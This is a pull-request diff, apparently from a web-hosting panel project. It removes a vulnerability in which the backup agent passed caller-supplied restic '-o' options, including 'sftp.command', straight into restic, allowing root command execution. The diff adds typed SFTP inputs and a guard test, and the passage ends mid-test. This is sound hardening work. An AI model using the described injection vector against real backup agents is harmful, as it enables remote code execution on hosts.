### PR TITLE
sec(backup): agent builds restic's sftp.command itself instead of taking it off the wire (JAB-194)

### DIFF
--- a/docs/site/platform/cli-reference.md
+++ b/docs/site/platform/cli-reference.md
@@ -4993,13 +4993,15 @@ jabali system restore [flags]
 - `--apply` — after staging, apply selected stages onto live host (default true) (default `true`)
 - `--apply-stage` — restrict apply to named stages (repeatable). Empty = panel_db + panel_config + tls (the safe defaults) (default `[]`)
 - `--credentials-ref` — absolute path to env file with backend creds (root:root 0600)
-- `--extra-option` — restic -o KEY=VALUE flag body (repeatable) (default `[]`)
 - `--force` — required — restore overwrites the running panel
 - `--include-accounts` — also restore each linked account
 - `--interactive` — force interactive prompts even when --remote-url is set
 - `--password` — restic password (literal; overrides --password-file). Avoid in shell history; prefer --interactive
 - `--password-file` — restic password file (default: /etc/jabali-panel/restic-repo.password)
 - `--remote-url` — restic repo URL or local path (e.g. sftp:user@host:/path)
+- `--sftp-auth` — SFTP auth mode: key | password (default: ssh config)
+- `--sftp-key` — absolute path to the SSH private key for SFTP
+- `--sftp-port` — SFTP port when not 22 (default `0`)
 - `--snapshot` — system_manifest snapshot ID, or 'latest' to auto-pick newest
 
 #### `jabali system services`

--- a/panel-agent/internal/commands/backup_create.go
+++ b/panel-agent/internal/commands/backup_create.go
@@ -88,10 +88,10 @@ type backupCreateParams struct {
 	// file holding backend credentials (AWS_*, B2_*, SSHPASS, …).
 	// Loaded by the agent and merged into the restic process env.
 	CredentialsRef string `json:"credentials_ref,omitempty"`
-	// ExtraOptions are restic `-o key=value` flag bodies — typically
+	// SFTP carries the typed destination inputs; the agent builds restic's
+	// `-o sftp.command=...` from them itself (JAB-194) — typically
 	// `sftp.command="..."` for SFTP destinations with non-default
 	// auth/port/key.
-	ExtraOptions []string `json:"extra_options,omitempty"`
 	// DestinationKind is the BackupDestination.Kind ("local","sftp",…)
 	// — drives auto-mkdir for SFTP repos that don't yet exist on the
 	// remote host.
@@ -174,11 +174,11 @@ func runBackupOrchestrator(ctx context.Context, req backupCreateParams) error {
 	defer jl.Close()
 	jl.Printf("account_backup start user_id=%s username=%s databases=%d mailboxes=%d destination=%s",
 		req.UserID, req.Username, len(req.Databases), len(req.Mailboxes), req.RepoURL)
-	if err := bkEnsureRepoReady(ctx, req.RepoURL, req.CredentialsRef, req.DestinationKind, req.SFTP, req.ExtraOptions); err != nil {
+	if err := bkEnsureRepoReady(ctx, req.RepoURL, req.CredentialsRef, req.DestinationKind, req.SFTP); err != nil {
 		jl.Printf("ensure_repo_failed=%v", err)
 		return fmt.Errorf("ensure repo: %w", err)
 	}
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return fmt.Errorf("restic config: %w", cerr)
 	}
@@ -268,7 +268,7 @@ func runHomeStage(ctx context.Context, req backupCreateParams) backup.ManifestSt
 	body, _ := json.Marshal(backupHomeParams{
 		JobID: req.JobID, UserID: req.UserID, Username: req.Username,
 		ScheduleID: req.ScheduleID, RepoURL: req.RepoURL,
-		CredentialsRef: req.CredentialsRef, ExtraOptions: req.ExtraOptions,
+		CredentialsRef: req.CredentialsRef, SFTP: req.SFTP,
 		Compression: req.Compression, Folders: req.Folders,
 	})
 	out, err := backupHomeHandler(ctx, body)
@@ -300,7 +300,7 @@ func runDatabaseStage(ctx context.Context, req backupCreateParams) []backup.Mani
 		JobID: req.JobID, UserID: req.UserID, Username: req.Username,
 		Databases: req.Databases, ScheduleID: req.ScheduleID,
 		RepoURL: req.RepoURL, CredentialsRef: req.CredentialsRef,
-		ExtraOptions: req.ExtraOptions, Compression: req.Compression,
+		SFTP: req.SFTP, Compression: req.Compression,
 	})
 	out, err := backupDatabasesHandler(ctx, body)
 	if err != nil {
@@ -410,7 +410,7 @@ func runMetadataStage(ctx context.Context, req backupCreateParams) backup.Manife
 		st.Warnings = []string{"metadata marshal: " + err.Error()}
 		return st
 	}
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		st.Status = backup.StageStatusFailed
 		st.Warnings = []string{"restic config: " + cerr.Error()}
@@ -441,7 +441,7 @@ func runMailStage(ctx context.Context, req backupCreateParams) backup.ManifestSt
 		JobID: req.JobID, UserID: req.UserID, Username: req.Username,
 		Mailboxes: req.Mailboxes, ScheduleID: req.ScheduleID,
 		RepoURL: req.RepoURL, CredentialsRef: req.CredentialsRef,
-		ExtraOptions: req.ExtraOptions, Compression: req.Compression,
+		SFTP: req.SFTP, Compression: req.Compression,
 	})
 	out, err := backupMailboxesHandler(ctx, body)
 	if err != nil {
@@ -473,11 +473,11 @@ func runMailStage(ctx context.Context, req backupCreateParams) backup.ManifestSt
 // present.
 func backupStatusHandler(ctx context.Context, raw json.RawMessage) (any, error) {
 	var req struct {
-		JobID          string   `json:"job_id"`
-		RepoURL        string   `json:"repo_url,omitempty"`
-		PasswordFile   string   `json:"password_file,omitempty"`
-		CredentialsRef string   `json:"credentials_ref,omitempty"`
-		ExtraOptions   []string `json:"extra_options,omitempty"`
+		JobID          string            `json:"job_id"`
+		RepoURL        string            `json:"repo_url,omitempty"`
+		PasswordFile   string            `json:"password_file,omitempty"`
+		CredentialsRef string            `json:"credentials_ref,omitempty"`
+		SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 	}
 	if err := json.Unmarshal(raw, &req); err != nil {
 		return nil, bkInvalidArg("malformed JSON body")
@@ -485,7 +485,7 @@ func backupStatusHandler(ctx context.Context, raw json.RawMessage) (any, error) 
 	if !ulidRE.MatchString(req.JobID) {
 		return nil, bkInvalidArg("job_id must be a 26-char ULID")
 	}
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_databases.go
+++ b/panel-agent/internal/commands/backup_databases.go
@@ -17,20 +17,20 @@ import (
 )
 
 type backupDatabasesParams struct {
-	JobID             string   `json:"job_id"`
-	UserID            string   `json:"user_id"`
-	Username          string   `json:"username"`
-	Databases         []string `json:"databases"`
+	JobID     string   `json:"job_id"`
+	UserID    string   `json:"user_id"`
+	Username  string   `json:"username"`
+	Databases []string `json:"databases"`
 	// M37: Postgres database names. Same dump → restic --stdin pipe
 	// shape; just swaps mariadb-dump for pg_dump -Fc. Optional —
 	// pre-M37 callers omit and behaviour is unchanged.
-	DatabasesPostgres []string `json:"databases_postgres,omitempty"`
-	ScheduleID        string   `json:"schedule_id,omitempty"`
-	RepoURL           string   `json:"repo_url,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	CredentialsRef    string   `json:"credentials_ref,omitempty"`
-	ExtraOptions      []string `json:"extra_options,omitempty"`
-	Compression    string   `json:"compression,omitempty"`
+	DatabasesPostgres []string          `json:"databases_postgres,omitempty"`
+	ScheduleID        string            `json:"schedule_id,omitempty"`
+	RepoURL           string            `json:"repo_url,omitempty"`
+	PasswordFile      string            `json:"password_file,omitempty"`
+	CredentialsRef    string            `json:"credentials_ref,omitempty"`
+	SFTP              *backupSFTPInputs `json:"sftp,omitempty"`
+	Compression       string            `json:"compression,omitempty"`
 }
 
 type backupDatabasesResult struct {
@@ -87,7 +87,7 @@ func backupDatabasesHandler(ctx context.Context, raw json.RawMessage) (any, erro
 		}
 	}
 
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_dest_testconn.go
+++ b/panel-agent/internal/commands/backup_dest_testconn.go
@@ -13,26 +13,16 @@ import (
 )
 
 type backupDestTestParams struct {
-	URL            string             `json:"url"`
-	CredentialsRef string             `json:"credentials_ref,omitempty"`
-	ExtraOptions   []string           `json:"extra_options,omitempty"`
-	SFTP           *backupTestSFTPIn  `json:"sftp,omitempty"`
-}
-
-type backupTestSFTPIn struct {
-	Host    string `json:"host"`
-	User    string `json:"user"`
-	Port    int    `json:"port,omitempty"`
-	Path    string `json:"path"`
-	Auth    string `json:"auth"`
-	KeyPath string `json:"key_path,omitempty"`
+	URL            string            `json:"url"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 }
 
 type backupDestTestResult struct {
-	Status         string `json:"status"`
-	StdoutPreview  string `json:"stdout_preview,omitempty"`
-	Stderr         string `json:"stderr,omitempty"`
-	Detail         string `json:"detail,omitempty"`
+	Status        string `json:"status"`
+	StdoutPreview string `json:"stdout_preview,omitempty"`
+	Stderr        string `json:"stderr,omitempty"`
+	Detail        string `json:"detail,omitempty"`
 }
 
 func backupDestTestHandler(ctx context.Context, raw json.RawMessage) (any, error) {
@@ -57,7 +47,7 @@ func backupDestTestHandler(ctx context.Context, raw json.RawMessage) (any, error
 		p.URL,
 		backup.DefaultPasswordFile,
 		extraEnv,
-		p.ExtraOptions,
+		bkResticOptions(p.SFTP),
 	)
 	if err != nil {
 		stderrStr := strings.TrimSpace(string(stderr))
@@ -93,7 +83,7 @@ func backupDestTestHandler(ctx context.Context, raw json.RawMessage) (any, error
 				p.URL,
 				backup.DefaultPasswordFile,
 				extraEnv,
-				p.ExtraOptions,
+				bkResticOptions(p.SFTP),
 			)
 			if initErr != nil {
 				initErrStr := strings.TrimSpace(string(initStderr))

--- a/panel-agent/internal/commands/backup_forget.go
+++ b/panel-agent/internal/commands/backup_forget.go
@@ -17,13 +17,13 @@ import (
 )
 
 type backupForgetParams struct {
-	JobID          string   `json:"job_id"`
-	UserID         string   `json:"user_id"`
-	Kind           string   `json:"kind"` // job-slot lock key (account_backup|system_backup)
-	RepoURL        string   `json:"repo_url"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
+	JobID          string            `json:"job_id"`
+	UserID         string            `json:"user_id"`
+	Kind           string            `json:"kind"` // job-slot lock key (account_backup|system_backup)
+	RepoURL        string            `json:"repo_url"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	PasswordFile   string            `json:"password_file,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 }
 
 type backupForgetResponse struct {
@@ -51,7 +51,7 @@ func backupForgetHandler(ctx context.Context, raw json.RawMessage) (any, error) 
 	}
 	defer defaultJobSlots.release("backup", p.UserID, p.RepoURL)
 
-	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_helpers.go
+++ b/panel-agent/internal/commands/backup_helpers.go
@@ -61,8 +61,51 @@ func bkResticBin() (string, error) {
 // (post-M30.2 / ADR-0080). repoURL empty falls back to the legacy
 // local repo so unit tests + callers that don't supply a destination
 // keep working unchanged.
-func bkResticConfig(repoURL, credentialsRef string, extraOptions []string) (backup.ResticConfig, error) {
-	return bkResticConfigWithPassword(repoURL, credentialsRef, "", extraOptions)
+func bkResticConfig(repoURL, credentialsRef string, sftp *backupSFTPInputs) (backup.ResticConfig, error) {
+	return bkResticConfigWithPassword(repoURL, credentialsRef, "", sftp)
+}
+
+// bkResticOptions builds restic's `-o key=value` flags for this request.
+//
+// SECURITY (JAB-194): the ONLY option the agent will ever pass to restic is
+// `sftp.command`, and the agent BUILDS it here from typed fields — it is never
+// accepted from the wire.
+//
+// `sftp.command` is the command restic executes to reach an SFTP backend, so a
+// caller who can set it gets arbitrary command execution as root. The agent
+// previously took a pre-built `extra_options []string` off the wire and passed
+// it into restic's argv unvalidated, across ten commands.
+//
+// An allowlist of permitted `-o` keys does not fix that, which is why the
+// contract changed instead: the dangerous key IS the one we legitimately use,
+// so any filter loose enough to admit our real value —
+//
+//	sftp.command=sshpass -e ssh -o StrictHostKeyChecking=accept-new … user@host -s sftp
+//
+// is loose enough to admit a hostile one. Scanning it for shell metacharacters
+// is equally hopeless when the legitimate value is full of spaces, quotes and
+// flags. Taking typed inputs and constructing the string here removes the
+// primitive rather than trying to recognise abuse of it — the same reasoning as
+// migration_admin_run.go taking a job_id and deriving the secret path itself.
+//
+// TestNoAgentBackupStructAcceptsExtraOptions keeps the wire field from coming
+// back.
+func bkResticOptions(sftp *backupSFTPInputs) []string {
+	if sftp == nil {
+		return nil
+	}
+	flag := backup.SFTPCommandFlag(backup.SFTPInputs{
+		Host:    sftp.Host,
+		User:    sftp.User,
+		Port:    sftp.Port,
+		Path:    sftp.Path,
+		Auth:    sftp.Auth,
+		KeyPath: sftp.KeyPath,
+	})
+	if flag == "" {
+		return nil
+	}
+	return []string{flag}
 }
 
 // bkResticConfigWithPassword is the variant used by interactive
@@ -70,7 +113,7 @@ func bkResticConfig(repoURL, credentialsRef string, extraOptions []string) (back
 // /etc/jabali-panel/restic-repo.password; non-empty lets the CLI hand
 // a temp-file path so a live host's runtime password isn't clobbered
 // during a drill / test recovery.
-func bkResticConfigWithPassword(repoURL, credentialsRef, passwordFile string, extraOptions []string) (backup.ResticConfig, error) {
+func bkResticConfigWithPassword(repoURL, credentialsRef, passwordFile string, sftp *backupSFTPInputs) (backup.ResticConfig, error) {
 	cfg := backup.DefaultConfig()
 	if repoURL != "" {
 		cfg.Repo = repoURL
@@ -78,9 +121,8 @@ func bkResticConfigWithPassword(repoURL, credentialsRef, passwordFile string, ex
 	if passwordFile != "" {
 		cfg.PasswordFile = passwordFile
 	}
-	if len(extraOptions) > 0 {
-		cfg.ExtraOptions = append([]string{}, extraOptions...)
-	}
+	// Built from typed inputs, never taken from the request (JAB-194).
+	cfg.ExtraOptions = bkResticOptions(sftp)
 	if credentialsRef != "" {
 		env, err := backup.LoadEnvFile(credentialsRef)
 		if err != nil {
@@ -95,7 +137,7 @@ func bkResticConfigWithPassword(repoURL, credentialsRef, passwordFile string, ex
 // `restic init` if the repo doesn't exist yet. Idempotent — succeeds
 // on already-initialized repos. Local destinations get the parent dir
 // created if missing; failures bubble up.
-func bkEnsureRepoReady(ctx context.Context, repoURL, credentialsRef, destKind string, sftp *backupSFTPInputs, extraOptions []string) error {
+func bkEnsureRepoReady(ctx context.Context, repoURL, credentialsRef, destKind string, sftp *backupSFTPInputs) error {
 	if repoURL == "" {
 		return nil
 	}
@@ -107,7 +149,7 @@ func bkEnsureRepoReady(ctx context.Context, repoURL, credentialsRef, destKind st
 		}
 		extraEnv = env
 	}
-	_, snapStderr, snapErr := backup.SnapshotsRemote(ctx, nil, repoURL, backup.DefaultPasswordFile, extraEnv, extraOptions)
+	_, snapStderr, snapErr := backup.SnapshotsRemote(ctx, nil, repoURL, backup.DefaultPasswordFile, extraEnv, bkResticOptions(sftp))
 	if snapErr == nil {
 		return nil
 	}
@@ -129,7 +171,7 @@ func bkEnsureRepoReady(ctx context.Context, repoURL, credentialsRef, destKind st
 			return fmt.Errorf("ssh mkdir: %w", err)
 		}
 	}
-	_, initStderr, initErr := backup.InitRemote(ctx, nil, repoURL, backup.DefaultPasswordFile, extraEnv, extraOptions)
+	_, initStderr, initErr := backup.InitRemote(ctx, nil, repoURL, backup.DefaultPasswordFile, extraEnv, bkResticOptions(sftp))
 	if initErr != nil {
 		ls := strings.ToLower(strings.TrimSpace(string(initStderr)))
 		if strings.Contains(ls, "already initialized") ||

--- a/panel-agent/internal/commands/backup_home.go
+++ b/panel-agent/internal/commands/backup_home.go
@@ -51,15 +51,15 @@ func homeBackupIgnoreFile(homePath string) (string, bool) {
 }
 
 type backupHomeParams struct {
-	JobID          string   `json:"job_id"`
-	UserID         string   `json:"user_id"`
-	Username       string   `json:"username"`
-	ScheduleID     string   `json:"schedule_id,omitempty"`
-	RepoURL        string   `json:"repo_url,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
-	Compression    string   `json:"compression,omitempty"`
+	JobID          string            `json:"job_id"`
+	UserID         string            `json:"user_id"`
+	Username       string            `json:"username"`
+	ScheduleID     string            `json:"schedule_id,omitempty"`
+	RepoURL        string            `json:"repo_url,omitempty"`
+	PasswordFile   string            `json:"password_file,omitempty"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
+	Compression    string            `json:"compression,omitempty"`
 	// Folders restricts the backup to these paths under the account home
 	// (relative or absolute-under-home). Empty = whole home (GH #294).
 	Folders []string `json:"folders,omitempty"`
@@ -106,7 +106,7 @@ func backupHomeHandler(ctx context.Context, raw json.RawMessage) (any, error) {
 		return nil, bkInternal("restic missing", err)
 	}
 
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_mailboxes.go
+++ b/panel-agent/internal/commands/backup_mailboxes.go
@@ -21,16 +21,16 @@ import (
 )
 
 type backupMailboxesParams struct {
-	JobID          string   `json:"job_id"`
-	UserID         string   `json:"user_id"`
-	Username       string   `json:"username"`
-	Mailboxes      []string `json:"mailboxes"`
-	ScheduleID     string   `json:"schedule_id,omitempty"`
-	RepoURL        string   `json:"repo_url,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
-	Compression    string   `json:"compression,omitempty"`
+	JobID          string            `json:"job_id"`
+	UserID         string            `json:"user_id"`
+	Username       string            `json:"username"`
+	Mailboxes      []string          `json:"mailboxes"`
+	ScheduleID     string            `json:"schedule_id,omitempty"`
+	RepoURL        string            `json:"repo_url,omitempty"`
+	PasswordFile   string            `json:"password_file,omitempty"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
+	Compression    string            `json:"compression,omitempty"`
 }
 
 type backupMailboxesResult struct {
@@ -108,7 +108,7 @@ func backupMailboxesHandler(ctx context.Context, raw json.RawMessage) (any, erro
 		}
 	}
 
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_materialize.go
+++ b/panel-agent/internal/commands/backup_materialize.go
@@ -5,12 +5,12 @@
 // `restic restore` step has to happen here as root.
 //
 // Flow:
-//   1. panel-api calls backup.materialize → agent restores snapshot to
-//      /var/lib/jabali-backups/downloads/<job_id>/ as root:jabali 0750.
-//   2. panel-api streams `tar -I zstd -cf -` over the restored dir to
-//      the HTTP client (jabali user can read because of the group).
-//   3. panel-api calls backup.materialize_cleanup → agent rm -rf's the
-//      dir to free the disk.
+//  1. panel-api calls backup.materialize → agent restores snapshot to
+//     /var/lib/jabali-backups/downloads/<job_id>/ as root:jabali 0750.
+//  2. panel-api streams `tar -I zstd -cf -` over the restored dir to
+//     the HTTP client (jabali user can read because of the group).
+//  3. panel-api calls backup.materialize_cleanup → agent rm -rf's the
+//     dir to free the disk.
 //
 // The download root is created lazily on first call. install.sh
 // guarantees the parent /var/lib/jabali-backups exists; the per-job
@@ -44,16 +44,16 @@ type backupMaterializeParams struct {
 	// handler always materializes ALL snapshots tagged job-id=<JobID>
 	// because the manifest snapshot alone holds only manifest.json
 	// (the real data lives in sibling stage=home/db/mail snapshots).
-	SnapshotID     string   `json:"snapshot_id,omitempty"`
-	RepoURL        string   `json:"repo_url,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
+	SnapshotID     string            `json:"snapshot_id,omitempty"`
+	RepoURL        string            `json:"repo_url,omitempty"`
+	PasswordFile   string            `json:"password_file,omitempty"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 }
 
 type backupMaterializeResult struct {
-	Path     string `json:"path"`
-	Stages   []string `json:"stages"`
+	Path   string   `json:"path"`
+	Stages []string `json:"stages"`
 }
 
 func backupMaterializeHandler(ctx context.Context, raw json.RawMessage) (any, error) {
@@ -93,7 +93,7 @@ func backupMaterializeHandler(ctx context.Context, raw json.RawMessage) (any, er
 		return nil, fmt.Errorf("mkdir target: %w", err)
 	}
 
-	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.SFTP)
 	if cerr != nil {
 		return nil, fmt.Errorf("restic config: %w", cerr)
 	}

--- a/panel-agent/internal/commands/backup_restore.go
+++ b/panel-agent/internal/commands/backup_restore.go
@@ -45,11 +45,11 @@ type backupRestoreParams struct {
 	// TargetUsername is the system account name (matches /etc/passwd).
 	// Required for the apply step to chown home + scope mariadb loads.
 	// API resolves this from the panel users repo before dispatching.
-	TargetUsername string   `json:"target_username,omitempty"`
-	Overwrite      bool     `json:"overwrite"`
-	RepoURL        string   `json:"repo_url,omitempty"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
+	TargetUsername string            `json:"target_username,omitempty"`
+	Overwrite      bool              `json:"overwrite"`
+	RepoURL        string            `json:"repo_url,omitempty"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 	// ApplyStaged: when false the handler stops after materializing
 	// stages into /var/lib/jabali-backups/restore-staging/<job_id>/
 	// (recon mode). Default true → home+db are applied onto the live
@@ -118,7 +118,7 @@ func backupRestoreHandler(ctx context.Context, raw json.RawMessage) (any, error)
 	}
 	defer syscall.Flock(int(lf.Fd()), syscall.LOCK_UN)
 
-	cfg, cerr := bkResticConfig(req.RepoURL, req.CredentialsRef, req.ExtraOptions)
+	cfg, cerr := bkResticConfig(req.RepoURL, req.CredentialsRef, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}
@@ -613,10 +613,10 @@ func chownTreeRecursive(root string, uid, gid int) error {
 // renders as a friendly grouping.
 func backupAccountListManifestsHandler(ctx context.Context, raw json.RawMessage) (any, error) {
 	var req struct {
-		RepoURL        string   `json:"repo_url"`
-		CredentialsRef string   `json:"credentials_ref,omitempty"`
-		PasswordFile   string   `json:"password_file,omitempty"`
-		ExtraOptions   []string `json:"extra_options,omitempty"`
+		RepoURL        string            `json:"repo_url"`
+		CredentialsRef string            `json:"credentials_ref,omitempty"`
+		PasswordFile   string            `json:"password_file,omitempty"`
+		SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 		// UserID optional; when set returns only that account's
 		// manifests. Useful to narrow when the repo carries many users.
 		UserID string `json:"user_id,omitempty"`
@@ -627,7 +627,7 @@ func backupAccountListManifestsHandler(ctx context.Context, raw json.RawMessage)
 	if req.RepoURL == "" {
 		return nil, bkInvalidArg("repo_url required")
 	}
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_restore_selective.go
+++ b/panel-agent/internal/commands/backup_restore_selective.go
@@ -49,10 +49,10 @@ type backupRestoreSelectiveParams struct {
 	RestoreHome        bool     `json:"home"`
 	Overwrite          bool     `json:"overwrite"`
 	// Restic dest (optional; empty = default local repo, like materialize).
-	RepoURL        string   `json:"repo_url,omitempty"`
-	CredentialsRef string   `json:"credentials_ref,omitempty"`
-	PasswordFile   string   `json:"password_file,omitempty"`
-	ExtraOptions   []string `json:"extra_options,omitempty"`
+	RepoURL        string            `json:"repo_url,omitempty"`
+	CredentialsRef string            `json:"credentials_ref,omitempty"`
+	PasswordFile   string            `json:"password_file,omitempty"`
+	SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 }
 
 type backupRestoreSelectiveResult struct {
@@ -97,7 +97,7 @@ func backupRestoreSelectiveHandler(ctx context.Context, raw json.RawMessage) (an
 	}
 	defer syscall.Flock(int(lf.Fd()), syscall.LOCK_UN)
 
-	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(p.RepoURL, p.CredentialsRef, p.PasswordFile, p.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}

--- a/panel-agent/internal/commands/backup_sftp_wire_test.go
+++ b/panel-agent/internal/commands/backup_sftp_wire_test.go
@@ -1,0 +1,165 @@
+package commands
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"testing"
+
+	"git.jabali-panel.com/shukivaknin/jabali2/internal/backup"
+)
+
+// TestNoAgentBackupStructAcceptsExtraOptions is the structural half of
+// JAB-194, and the one that matters most: it fails if ANY agent request struct
+// grows a free-form restic-option field again.
+//
+// The agent used to take `extra_options []string` off the wire on ten backup
+// commands and pass it straight into restic's argv as `-o <opt>`. One of those
+// options, `sftp.command`, is the command restic EXECUTES to reach an SFTP
+// backend — so any caller that could reach the agent had arbitrary command
+// execution as root.
+//
+// An allowlist of permitted keys cannot fix that: the dangerous key IS the one
+// we legitimately use, so any check loose enough to admit
+//
+//	sftp.command=sshpass -e ssh -o StrictHostKeyChecking=accept-new … -s sftp
+//
+// admits a hostile value too. The contract changed instead — the agent takes
+// typed SFTP fields and builds the option itself — so the correct assertion is
+// the ABSENCE of the wire field, not the presence of a filter. A test that
+// checked "malicious input is rejected" would pass just as happily against a
+// filter that misses one encoding.
+func TestNoAgentBackupStructAcceptsExtraOptions(t *testing.T) {
+	t.Parallel()
+
+	files, err := filepath.Glob("backup_*.go")
+	if err != nil {
+		t.Fatalf("glob: %v", err)
+	}
+	if len(files) == 0 {
+		t.Fatal("matched no backup_*.go files — the layout moved and this test is checking nothing")
+	}
+
+	// Any json tag that would carry restic option bodies.
+	banned := regexp.MustCompile(`json:"(extra_options|restic_options|options)`)
+	var offenders []string
+	for _, f := range files {
+		if strings.HasSuffix(f, "_test.go") {
+			continue
+		}
+		body, err := os.ReadFile(f)
+		if err != nil {
+			t.Fatalf("read %s: %v", f, err)
+		}
+		for i, line := range strings.Split(string(body), "\n") {
+			if banned.MatchString(line) {
+				offenders = append(offenders, f+":"+itoa(i+1)+": "+strings.TrimSpace(line))
+			}
+		}
+	}
+	if len(offenders) > 0 {
+		t.Errorf("agent backup request struct(s) accept free-form restic options from the wire.\n"+
+			"`-o sftp.command=<cmd>` is the command restic EXECUTES for an SFTP backend, so this is "+
+			"remote command execution as root, and it cannot be made safe by filtering the value.\n"+
+			"Take the typed SFTP fields and let bkResticOptions build the flag (JAB-194).\n  %s",
+			strings.Join(offenders, "\n  "))
+	}
+}
+
+func itoa(n int) string {
+	if n == 0 {
+		return "0"
+	}
+	var b []byte
+	for n > 0 {
+		b = append([]byte{byte('0' + n%10)}, b...)
+		n /= 10
+	}
+	return string(b)
+}
+
+// The agent must produce exactly the option the panel used to send, or SFTP
+// destinations with a non-default port/key/password silently stop working
+// after the contract change.
+func TestBkResticOptionsMatchesSFTPCommandFlag(t *testing.T) {
+	t.Parallel()
+
+	for _, tc := range []struct {
+		name string
+		in   *backupSFTPInputs
+	}{
+		{"nil means no options", nil},
+		{"defaults need no override", &backupSFTPInputs{Host: "h", User: "u", Path: "/p"}},
+		{"non-default port", &backupSFTPInputs{Host: "h", User: "u", Path: "/p", Port: 2222}},
+		{"key auth", &backupSFTPInputs{Host: "h", User: "u", Path: "/p", Auth: "key", KeyPath: "/root/.ssh/id_ed25519"}},
+		{"password auth", &backupSFTPInputs{Host: "h", User: "u", Path: "/p", Auth: "password"}},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			got := bkResticOptions(tc.in)
+			if tc.in == nil {
+				if got != nil {
+					t.Fatalf("nil inputs must yield no options, got %q", got)
+				}
+				return
+			}
+			want := backup.SFTPCommandFlag(backup.SFTPInputs{
+				Host: tc.in.Host, User: tc.in.User, Port: tc.in.Port,
+				Path: tc.in.Path, Auth: tc.in.Auth, KeyPath: tc.in.KeyPath,
+			})
+			if want == "" {
+				if got != nil {
+					t.Fatalf("no override needed, but got %q", got)
+				}
+				return
+			}
+			if len(got) != 1 || got[0] != want {
+				t.Fatalf("got %q, want exactly [%q]", got, want)
+			}
+			if !strings.HasPrefix(got[0], "sftp.command=") {
